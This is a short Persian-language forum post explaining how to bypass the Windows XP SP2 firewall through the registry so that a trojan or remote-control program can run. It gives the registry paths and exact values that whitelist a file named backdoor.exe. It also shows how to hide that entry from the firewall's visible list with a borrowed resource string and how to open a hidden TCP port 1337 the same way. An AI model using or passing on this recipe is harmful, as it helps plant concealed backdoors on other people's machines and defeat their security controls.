دور زدن فايروال ويندوز ايكس پي - س
سلام دوستان
فايروال ويندوز ايكس پي - سرويس پك 2 براحتي از طريق رجيستري ويندوز قابل دور زدن است و مي توانيم نرم افزار ريموت كنترل و يا تروجان مد نظر خودما را نصب نماييم كافيست regedit.exe رو باز كنيد و به اين مسير برويد ‚
کد:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
همان طور كه مي بينيد اين جا ليت برنامه هاييست كه تاييد شده اند . فرض مي كنيم يك بك دور در اين مسير داريم
C:\WINDOWS\\system32\\backdoor.exe
حال يك استرينگ ايجاد مي كني
م
کد:
C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled
ولي ما بايستي برنامه را از ليست قابل مشاهده برنامه هاي تاييد شده مخفي نماييم كه اين كار براحتي ار طريق ايجاد يك استرينگ قابل انجام است
کد:
C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"
و اين كار را هم مي توانيم جهت هر پورتي كه مي خواهيم انجام دهيم ! به اين مسير رفته :
کد:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
و يك استرينگ ايجاد نماييم :
کد:
1337:TCP:*:Enabled:@xpsp2res.dll,-22003
كه در حالت پورت نيز مخفي ست !
موفق باشيد
